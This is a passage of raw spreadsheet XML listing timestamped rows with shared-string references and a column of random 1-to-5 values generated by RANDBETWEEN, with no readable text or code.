      <c r="F26566">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26567" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26567" s="1">
        <v>42914.550706018519</v>
      </c>
      <c r="C26567" t="s">
        <v>10</v>
      </c>
      <c r="D26567" t="s">
        <v>6</v>
      </c>
      <c r="E26567" t="s">
        <v>24148</v>
      </c>
      <c r="F26567">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26568" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26568" s="1">
        <v>42914.548900462964</v>
      </c>
      <c r="C26568" t="s">
        <v>10</v>
      </c>
      <c r="D26568" t="s">
        <v>89</v>
      </c>
      <c r="E26568" t="s">
        <v>24149</v>
      </c>
      <c r="F26568">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26569" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26569" s="1">
        <v>42914.548078703701</v>
      </c>
      <c r="C26569" t="s">
        <v>65</v>
      </c>
      <c r="E26569" t="s">
        <v>24150</v>
      </c>
      <c r="F26569">
        <f t="shared" ca="1" si="415"/>
        <v>2</v>
      </c>
    </row>
    <row r="26570" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26570" s="1">
        <v>42914.531863425924</v>
      </c>
      <c r="C26570" t="s">
        <v>10</v>
      </c>
      <c r="D26570" t="s">
        <v>178</v>
      </c>
      <c r="E26570" t="s">
        <v>24151</v>
      </c>
      <c r="F26570">
        <f t="shared" ca="1" si="415"/>
        <v>2</v>
      </c>
    </row>
    <row r="26571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26571" s="1">
        <v>42914.502349537041</v>
      </c>
      <c r="C26571" t="s">
        <v>10</v>
      </c>
      <c r="D26571" t="s">
        <v>80</v>
      </c>
      <c r="E26571" t="s">
        <v>24152</v>
      </c>
      <c r="F26571">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26572" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26572" s="1">
        <v>42914.497083333335</v>
      </c>
      <c r="C26572" t="s">
        <v>10</v>
      </c>
      <c r="D26572" t="s">
        <v>158</v>
      </c>
      <c r="E26572" t="s">
        <v>24153</v>
      </c>
      <c r="F26572">
        <f t="shared" ca="1" si="415"/>
        <v>2</v>
      </c>
    </row>
    <row r="26573" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26573" s="1">
        <v>42914.48678240741</v>
      </c>
      <c r="C26573" t="s">
        <v>10</v>
      </c>
      <c r="D26573" t="s">
        <v>6</v>
      </c>
      <c r="E26573" t="s">
        <v>24154</v>
      </c>
      <c r="F26573">
        <f t="shared" ca="1" si="415"/>
        <v>2</v>
      </c>
    </row>
    <row r="26574" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26574" s="1">
        <v>42914.475173611114</v>
      </c>
      <c r="C26574" t="s">
        <v>10</v>
      </c>
      <c r="D26574" t="s">
        <v>94</v>
      </c>
      <c r="E26574" t="s">
        <v>24155</v>
      </c>
      <c r="F26574">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26575" s="1">
        <v>42914.443622685183</v>
      </c>
      <c r="C26575" t="s">
        <v>10</v>
      </c>
      <c r="D26575" t="s">
        <v>86</v>
      </c>
      <c r="E26575" t="s">
        <v>24156</v>
      </c>
      <c r="F26575">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26576" s="1">
        <v>42914.39806712963</v>
      </c>
      <c r="C26576" t="s">
        <v>48</v>
      </c>
      <c r="E26576" t="s">
        <v>24157</v>
      </c>
      <c r="F26576">
        <f t="shared" ca="1" si="415"/>
        <v>2</v>
      </c>
    </row>
    <row r="26577" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26577" s="1">
        <v>42914.391562500001</v>
      </c>
      <c r="C26577" t="s">
        <v>1080</v>
      </c>
      <c r="E26577" s="2" t="s">
        <v>24158</v>
      </c>
      <c r="F26577">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26578" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26578" s="1">
        <v>42914.289155092592</v>
      </c>
      <c r="C26578" t="s">
        <v>1080</v>
      </c>
      <c r="E26578" t="s">
        <v>24159</v>
      </c>
      <c r="F26578">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26579" s="1">
        <v>42914.284953703704</v>
      </c>
      <c r="C26579" t="s">
        <v>71</v>
      </c>
      <c r="E26579" t="s">
        <v>24160</v>
      </c>
      <c r="F26579">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26580" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26580" s="1">
        <v>42914.262986111113</v>
      </c>
      <c r="C26580" t="s">
        <v>10</v>
      </c>
      <c r="D26580" t="s">
        <v>381</v>
      </c>
      <c r="F26580">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26581" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26581" s="1">
        <v>42914.241805555554</v>
      </c>
      <c r="C26581" t="s">
        <v>454</v>
      </c>
      <c r="E26581" s="2" t="s">
        <v>24161</v>
      </c>
      <c r="F26581">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26582" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26582" s="1">
        <v>42914.202291666668</v>
      </c>
      <c r="C26582" t="s">
        <v>48</v>
      </c>
      <c r="E26582" s="2" t="s">
        <v>24162</v>
      </c>
      <c r="F26582">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26583" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26583" s="1">
        <v>42914.196747685186</v>
      </c>
      <c r="C26583" t="s">
        <v>65</v>
      </c>
      <c r="E26583" s="2" t="s">
        <v>24163</v>
      </c>
      <c r="F26583">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26584" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A26584" s="1">
        <v>42914.188703703701</v>
      </c>
      <c r="C26584" t="s">
        <v>48</v>
      </c>
      <c r="E26584" s="2" t="s">
        <v>24164</v>
      </c>
      <c r="F26584">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26585" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26585" s="1">
        <v>42914.172546296293</v>
      </c>
      <c r="C26585" t="s">
        <v>103</v>
      </c>
      <c r="E26585" s="2" t="s">
        <v>24165</v>
      </c>
      <c r="F26585">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26586" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26586" s="1">
        <v>42914.1637962963</v>
      </c>
      <c r="C26586" t="s">
        <v>71</v>
      </c>
      <c r="E26586" s="2" t="s">
        <v>24166</v>
      </c>
      <c r="F26586">
        <f t="shared" ca="1" si="415"/>
        <v>2</v>
      </c>
    </row>
    <row r="26587" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26587" s="1">
        <v>42914.155659722222</v>
      </c>
      <c r="C26587" t="s">
        <v>10</v>
      </c>
      <c r="D26587" t="s">
        <v>381</v>
      </c>
      <c r="E26587" t="s">
        <v>24167</v>
      </c>
      <c r="F26587">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26588" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26588" s="1">
        <v>42914.009525462963</v>
      </c>
      <c r="C26588" t="s">
        <v>6</v>
      </c>
      <c r="D26588" t="s">
        <v>194</v>
      </c>
      <c r="E26588" t="s">
        <v>24168</v>
      </c>
      <c r="F26588">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26589" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26589" s="1">
        <v>42913.903946759259</v>
      </c>
      <c r="C26589" t="s">
        <v>10</v>
      </c>
      <c r="D26589" t="s">
        <v>52</v>
      </c>
      <c r="E26589" s="2" t="s">
        <v>24169</v>
      </c>
      <c r="F26589">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26590" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26590" s="1">
        <v>42913.833495370367</v>
      </c>
      <c r="C26590" t="s">
        <v>10</v>
      </c>
      <c r="D26590" t="s">
        <v>46</v>
      </c>
      <c r="E26590" t="s">
        <v>24170</v>
      </c>
      <c r="F26590">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26591" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A26591" s="1">
        <v>42913.763888888891</v>
      </c>
      <c r="C26591" t="s">
        <v>103</v>
      </c>
      <c r="E26591" s="2" t="s">
        <v>21606</v>
      </c>
      <c r="F26591">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26592" s="1">
        <v>42913.705937500003</v>
      </c>
      <c r="C26592" t="s">
        <v>10</v>
      </c>
      <c r="D26592" t="s">
        <v>6</v>
      </c>
      <c r="E26592" t="s">
        <v>24171</v>
      </c>
      <c r="F26592">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26593" s="1">
        <v>42913.672199074077</v>
      </c>
      <c r="C26593" t="s">
        <v>10</v>
      </c>
      <c r="D26593" t="s">
        <v>89</v>
      </c>
      <c r="E26593" t="s">
        <v>24172</v>
      </c>
      <c r="F26593">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26594" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26594" s="1">
        <v>42913.663888888892</v>
      </c>
      <c r="C26594" t="s">
        <v>10</v>
      </c>
      <c r="D26594" t="s">
        <v>178</v>
      </c>
      <c r="E26594" t="s">
        <v>24173</v>
      </c>
      <c r="F26594">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26595" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26595" s="1">
        <v>42913.651886574073</v>
      </c>
      <c r="C26595" t="s">
        <v>10</v>
      </c>
      <c r="D26595" t="s">
        <v>52</v>
      </c>
      <c r="E26595" t="s">
        <v>24174</v>
      </c>
      <c r="F26595">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26596" s="1">
        <v>42913.622569444444</v>
      </c>
      <c r="C26596" t="s">
        <v>10</v>
      </c>
      <c r="D26596" t="s">
        <v>14</v>
      </c>
      <c r="E26596" t="s">
        <v>24175</v>
      </c>
      <c r="F26596">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26597" s="1">
        <v>42913.621516203704</v>
      </c>
      <c r="C26597" t="s">
        <v>10</v>
      </c>
      <c r="D26597" t="s">
        <v>632</v>
      </c>
      <c r="E26597" t="s">
        <v>24176</v>
      </c>
      <c r="F26597">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26598" s="1">
        <v>42913.617303240739</v>
      </c>
      <c r="C26598" t="s">
        <v>10</v>
      </c>
      <c r="D26598" t="s">
        <v>11</v>
      </c>
      <c r="E26598" t="s">
        <v>24177</v>
      </c>
      <c r="F26598">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26599" s="1">
        <v>42913.592453703706</v>
      </c>
      <c r="C26599" t="s">
        <v>10</v>
      </c>
      <c r="D26599" t="s">
        <v>6</v>
      </c>
      <c r="E26599" t="s">
        <v>24178</v>
      </c>
      <c r="F26599">
        <f t="shared" ca="1" si="415"/>
        <v>2</v>
      </c>
    </row>
    <row r="26600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26600" s="1">
        <v>42913.592349537037</v>
      </c>
      <c r="C26600" t="s">
        <v>10</v>
      </c>
      <c r="D26600" t="s">
        <v>94</v>
      </c>
      <c r="E26600" t="s">
        <v>24179</v>
      </c>
      <c r="F26600">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26601" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26601" s="1">
        <v>42913.548449074071</v>
      </c>
      <c r="C26601" t="s">
        <v>10</v>
      </c>
      <c r="D26601" t="s">
        <v>6</v>
      </c>
      <c r="E26601" t="s">
        <v>24180</v>
      </c>
      <c r="F26601">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26602" s="1">
        <v>42913.52003472222</v>
      </c>
      <c r="C26602" t="s">
        <v>10</v>
      </c>
      <c r="D26602" t="s">
        <v>6</v>
      </c>
      <c r="E26602" t="s">
        <v>24181</v>
      </c>
      <c r="F26602">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26603" s="1">
        <v>42913.515057870369</v>
      </c>
      <c r="C26603" t="s">
        <v>10</v>
      </c>
      <c r="D26603" t="s">
        <v>17</v>
      </c>
      <c r="E26603" t="s">
        <v>24182</v>
      </c>
      <c r="F26603">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26604" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26604" s="1">
        <v>42913.510277777779</v>
      </c>
      <c r="C26604" t="s">
        <v>48</v>
      </c>
      <c r="E26604" s="2" t="s">
        <v>24183</v>
      </c>
      <c r="F26604">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26605" s="1">
        <v>42913.505891203706</v>
      </c>
      <c r="C26605" t="s">
        <v>10</v>
      </c>
      <c r="D26605" t="s">
        <v>667</v>
      </c>
      <c r="E26605" t="s">
        <v>24184</v>
      </c>
      <c r="F26605">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26606" s="1">
        <v>42913.505416666667</v>
      </c>
      <c r="C26606" t="s">
        <v>10</v>
      </c>
      <c r="D26606" t="s">
        <v>229</v>
      </c>
      <c r="E26606" t="s">
        <v>24185</v>
      </c>
      <c r="F26606">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26607" s="1">
        <v>42913.482881944445</v>
      </c>
      <c r="C26607" t="s">
        <v>10</v>
      </c>
      <c r="D26607" t="s">
        <v>80</v>
      </c>
      <c r="E26607" t="s">
        <v>24186</v>
      </c>
      <c r="F26607">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26608" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26608" s="1">
        <v>42913.473946759259</v>
      </c>
      <c r="C26608" t="s">
        <v>107</v>
      </c>
      <c r="E26608" s="2" t="s">
        <v>24187</v>
      </c>
      <c r="F26608">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26609" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26609" s="1">
        <v>42913.433240740742</v>
      </c>
      <c r="C26609" t="s">
        <v>48</v>
      </c>
      <c r="E26609" s="2" t="s">
        <v>24188</v>
      </c>
      <c r="F26609">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26610" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26610" s="1">
        <v>42913.417314814818</v>
      </c>
      <c r="C26610" t="s">
        <v>10</v>
      </c>
      <c r="D26610" t="s">
        <v>17</v>
      </c>
      <c r="E26610" t="s">
        <v>24189</v>
      </c>
      <c r="F26610">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26611" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26611" s="1">
        <v>42913.399629629632</v>
      </c>
      <c r="C26611" t="s">
        <v>6</v>
      </c>
      <c r="D26611" t="s">
        <v>25</v>
      </c>
      <c r="E26611" s="2" t="s">
        <v>24190</v>
      </c>
      <c r="F26611">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26612" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26612" s="1">
        <v>42913.370127314818</v>
      </c>
      <c r="C26612" t="s">
        <v>6</v>
      </c>
      <c r="D26612" t="s">
        <v>194</v>
      </c>
      <c r="E26612" s="2" t="s">
        <v>24191</v>
      </c>
      <c r="F26612">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26613" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26613" s="1">
        <v>42913.334305555552</v>
      </c>
      <c r="C26613" t="s">
        <v>71</v>
      </c>
      <c r="E26613" s="2" t="s">
        <v>24192</v>
      </c>
      <c r="F26613">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26614" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26614" s="1">
        <v>42913.323437500003</v>
      </c>
      <c r="C26614" t="s">
        <v>454</v>
      </c>
      <c r="E26614" s="2" t="s">
        <v>24193</v>
      </c>
      <c r="F26614">
        <f t="shared" ca="1" si="415"/>
        <v>2</v>
      </c>
    </row>
    <row r="26615" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A26615" s="1">
        <v>42913.29105324074</v>
      </c>
      <c r="C26615" t="s">
        <v>48</v>
      </c>
      <c r="E26615" s="2" t="s">
        <v>24194</v>
      </c>
      <c r="F26615">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26616" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26616" s="1">
        <v>42913.268587962964</v>
      </c>
      <c r="C26616" t="s">
        <v>41</v>
      </c>
      <c r="E26616" t="s">
        <v>24195</v>
      </c>
      <c r="F26616">
        <f t="shared" ca="1" si="415"/>
        <v>2</v>
      </c>
    </row>
    <row r="26617" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26617" s="1">
        <v>42913.26699074074</v>
      </c>
      <c r="C26617" t="s">
        <v>461</v>
      </c>
      <c r="E26617" s="2" t="s">
        <v>24196</v>
      </c>
      <c r="F26617">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26618" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26618" s="1">
        <v>42913.257175925923</v>
      </c>
      <c r="C26618" t="s">
        <v>686</v>
      </c>
      <c r="E26618" s="2" t="s">
        <v>24197</v>
      </c>
      <c r="F26618">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26619" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26619" s="1">
        <v>42913.220590277779</v>
      </c>
      <c r="C26619" t="s">
        <v>48</v>
      </c>
      <c r="E26619" t="s">
        <v>24198</v>
      </c>
      <c r="F26619">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26620" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26620" s="1">
        <v>42913.204826388886</v>
      </c>
      <c r="C26620" t="s">
        <v>140</v>
      </c>
      <c r="D26620" t="s">
        <v>141</v>
      </c>
      <c r="E26620" t="s">
        <v>24199</v>
      </c>
      <c r="F26620">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26621" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A26621" s="1">
        <v>42913.164363425924</v>
      </c>
      <c r="C26621" t="s">
        <v>41</v>
      </c>
      <c r="E26621" s="2" t="s">
        <v>24200</v>
      </c>
      <c r="F26621">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26622" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A26622" s="1">
        <v>42913.057696759257</v>
      </c>
      <c r="C26622" t="s">
        <v>41</v>
      </c>
      <c r="D26622" t="s">
        <v>312</v>
      </c>
      <c r="E26622" s="2" t="s">
        <v>24201</v>
      </c>
      <c r="F26622">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26623" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A26623" s="1">
        <v>42913.057673611111</v>
      </c>
      <c r="C26623" t="s">
        <v>41</v>
      </c>
      <c r="D26623" t="s">
        <v>312</v>
      </c>
      <c r="E26623" s="2" t="s">
        <v>24201</v>
      </c>
      <c r="F26623">
        <f t="shared" ca="1" si="415"/>
        <v>1</v>
      </c>
    </row>
    <row r="26624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26624" s="1">
        <v>42913.031805555554</v>
      </c>
      <c r="C26624" t="s">
        <v>993</v>
      </c>
      <c r="E26624" t="s">
        <v>24202</v>
      </c>
      <c r="F26624">
        <f t="shared" ca="1" si="415"/>
        <v>5</v>
      </c>
    </row>
    <row r="26625" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26625" s="1">
        <v>42912.936122685183</v>
      </c>
      <c r="C26625" t="s">
        <v>139</v>
      </c>
      <c r="E26625" s="2" t="s">
        <v>24203</v>
      </c>
      <c r="F26625">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26626" s="1">
        <v>42912.900590277779</v>
      </c>
      <c r="C26626" t="s">
        <v>140</v>
      </c>
      <c r="D26626" t="s">
        <v>141</v>
      </c>
      <c r="E26626" t="s">
        <v>24204</v>
      </c>
      <c r="F26626">
        <f t="shared" ref="F26626:F26689" ca="1" si="416">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="26627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26627" s="1">
        <v>42912.795706018522</v>
      </c>
      <c r="C26627" t="s">
        <v>10</v>
      </c>
      <c r="D26627" t="s">
        <v>94</v>
      </c>
      <c r="E26627" t="s">
        <v>24205</v>
      </c>
      <c r="F26627">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26628" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A26628" s="1">
        <v>42912.786412037036</v>
      </c>
      <c r="C26628" t="s">
        <v>10</v>
      </c>
      <c r="D26628" t="s">
        <v>20</v>
      </c>
      <c r="E26628" s="2" t="s">
        <v>24206</v>
      </c>
      <c r="F26628">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26629" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26629" s="1">
        <v>42912.781458333331</v>
      </c>
      <c r="C26629" t="s">
        <v>10</v>
      </c>
      <c r="D26629" t="s">
        <v>89</v>
      </c>
      <c r="E26629" t="s">
        <v>24207</v>
      </c>
      <c r="F26629">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26630" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26630" s="1">
        <v>42912.755416666667</v>
      </c>
      <c r="C26630" t="s">
        <v>10</v>
      </c>
      <c r="D26630" t="s">
        <v>6</v>
      </c>
      <c r="E26630" t="s">
        <v>24208</v>
      </c>
      <c r="F26630">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26631" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26631" s="1">
        <v>42912.719837962963</v>
      </c>
      <c r="C26631" t="s">
        <v>10</v>
      </c>
      <c r="D26631" t="s">
        <v>151</v>
      </c>
      <c r="E26631" t="s">
        <v>6267</v>
      </c>
      <c r="F26631">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26632" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26632" s="1">
        <v>42912.647592592592</v>
      </c>
      <c r="C26632" t="s">
        <v>10</v>
      </c>
      <c r="D26632" t="s">
        <v>17</v>
      </c>
      <c r="E26632" t="s">
        <v>24209</v>
      </c>
      <c r="F26632">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26633" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26633" s="1">
        <v>42912.632835648146</v>
      </c>
      <c r="C26633" t="s">
        <v>10</v>
      </c>
      <c r="D26633" t="s">
        <v>112</v>
      </c>
      <c r="E26633" s="2" t="s">
        <v>24210</v>
      </c>
      <c r="F26633">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26634" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26634" s="1">
        <v>42912.616608796299</v>
      </c>
      <c r="C26634" t="s">
        <v>10</v>
      </c>
      <c r="D26634" t="s">
        <v>89</v>
      </c>
      <c r="E26634" t="s">
        <v>24211</v>
      </c>
      <c r="F26634">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26635" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26635" s="1">
        <v>42912.594895833332</v>
      </c>
      <c r="C26635" t="s">
        <v>10</v>
      </c>
      <c r="D26635" t="s">
        <v>667</v>
      </c>
      <c r="E26635" t="s">
        <v>24212</v>
      </c>
      <c r="F26635">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26636" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26636" s="1">
        <v>42912.535462962966</v>
      </c>
      <c r="C26636" t="s">
        <v>10</v>
      </c>
      <c r="D26636" t="s">
        <v>89</v>
      </c>
      <c r="E26636" t="s">
        <v>24213</v>
      </c>
      <c r="F26636">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26637" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26637" s="1">
        <v>42912.500590277778</v>
      </c>
      <c r="C26637" t="s">
        <v>10</v>
      </c>
      <c r="D26637" t="s">
        <v>151</v>
      </c>
      <c r="E26637" t="s">
        <v>24214</v>
      </c>
      <c r="F26637">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26638" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26638" s="1">
        <v>42912.496215277781</v>
      </c>
      <c r="C26638" t="s">
        <v>6</v>
      </c>
      <c r="D26638" t="s">
        <v>114</v>
      </c>
      <c r="E26638" s="2" t="s">
        <v>24215</v>
      </c>
      <c r="F26638">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26639" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A26639" s="1">
        <v>42912.480011574073</v>
      </c>
      <c r="C26639" t="s">
        <v>10</v>
      </c>
      <c r="D26639" t="s">
        <v>20</v>
      </c>
      <c r="E26639" s="2" t="s">
        <v>24216</v>
      </c>
      <c r="F26639">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26640" s="1">
        <v>42912.476550925923</v>
      </c>
      <c r="C26640" t="s">
        <v>10</v>
      </c>
      <c r="D26640" t="s">
        <v>229</v>
      </c>
      <c r="E26640" t="s">
        <v>24217</v>
      </c>
      <c r="F26640">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26641" s="1">
        <v>42912.458715277775</v>
      </c>
      <c r="C26641" t="s">
        <v>836</v>
      </c>
      <c r="E26641" t="s">
        <v>24218</v>
      </c>
      <c r="F26641">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26642" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26642" s="1">
        <v>42912.440185185187</v>
      </c>
      <c r="C26642" t="s">
        <v>65</v>
      </c>
      <c r="F26642">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26643" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26643" s="1">
        <v>42912.439502314817</v>
      </c>
      <c r="C26643" t="s">
        <v>10</v>
      </c>
      <c r="D26643" t="s">
        <v>271</v>
      </c>
      <c r="E26643" t="s">
        <v>24219</v>
      </c>
      <c r="F26643">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26644" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A26644" s="1">
        <v>42912.425868055558</v>
      </c>
      <c r="C26644" t="s">
        <v>50</v>
      </c>
      <c r="E26644" s="2" t="s">
        <v>24220</v>
      </c>
      <c r="F26644">
        <f t="shared" ca="1" si="416"/>
